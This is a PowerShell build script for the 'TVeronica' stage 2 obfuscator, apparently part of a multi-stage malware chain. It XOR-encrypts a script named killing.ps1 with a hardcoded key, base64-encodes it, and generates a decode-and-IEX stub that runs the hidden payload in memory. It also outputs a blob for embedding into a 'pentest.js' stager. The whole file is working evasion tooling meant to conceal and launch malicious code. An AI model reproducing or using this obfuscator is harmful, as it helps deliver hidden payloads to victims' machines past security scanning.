# build.ps1 — TVeronica stage 2 obfuscator
# Encodes killing.ps1 as base64( XOR( source, KEY ) ) and emits a tiny decode+IEX stub.
# Same convention as stage1/build.ps1 (key bytes stored XOR 0x5A).
# Usage: powershell -NoProfile -ExecutionPolicy Bypass -File build.ps1

param(
    [string]$Src = 'killing.ps1',
    [string]$Out = 'killing_obf.ps1'
)

$KEY = 'snapec2_secret'                      # same key as stage1/build.ps1
$key = [Text.Encoding]::UTF8.GetBytes($KEY)

if ([IO.Path]::IsPathRooted($Src)) { $srcPath = $Src } else { $srcPath = Join-Path $PSScriptRoot $Src }
if (-not (Test-Path $srcPath)) { Write-Host "[-] source not found: $srcPath"; exit 1 }

$ps  = [IO.File]::ReadAllBytes($srcPath)
$enc = New-Object byte[] $ps.Length
for ($i = 0; $i -lt $ps.Length; $i++) {
    $enc[$i] = $ps[$i] -bxor $key[$i % $key.Length]
}
$b64 = [Convert]::ToBase64String($enc)

# key bytes XOR 0x5A (same trick as stage1 stager)
$kb = ($key | ForEach-Object { '0x{0:X2}' -f ($_ -bxor 0x5A) }) -join ','

$stub = @"
# obfuscated stub - generated by build.ps1 (TVeronica stage 2)
`$B = '$b64'
`$KB = @($kb)
`$k = -join (`$KB | ForEach-Object { [char](`$_ -bxor 0x5A) })
`$b = [Convert]::FromBase64String(`$B)
for (`$i = 0; `$i -lt `$b.Length; `$i++) {
    `$b[`$i] = `$b[`$i] -bxor [byte][char]`$k[`$i % `$k.Length]
}
IEX ([Text.Encoding]::UTF8.GetString(`$b))
"@

if ([IO.Path]::IsPathRooted($Out)) { $outPath = $Out } else { $outPath = Join-Path $PSScriptRoot $Out }
[IO.File]::WriteAllText($outPath, $stub, [Text.Encoding]::UTF8)

# also emit the raw blob for embedding (e.g. into pentest.js via stage1/build.ps1)
$b64Path = Join-Path $PSScriptRoot 'killing.b64.txt'
[IO.File]::WriteAllText($b64Path, $b64, [Text.Encoding]::UTF8)

Write-Host "[+] wrote $Out (stub)"
Write-Host "[+] wrote killing.b64.txt (blob $($b64.Length) chars)"
Write-Host "    key bytes: $kb"
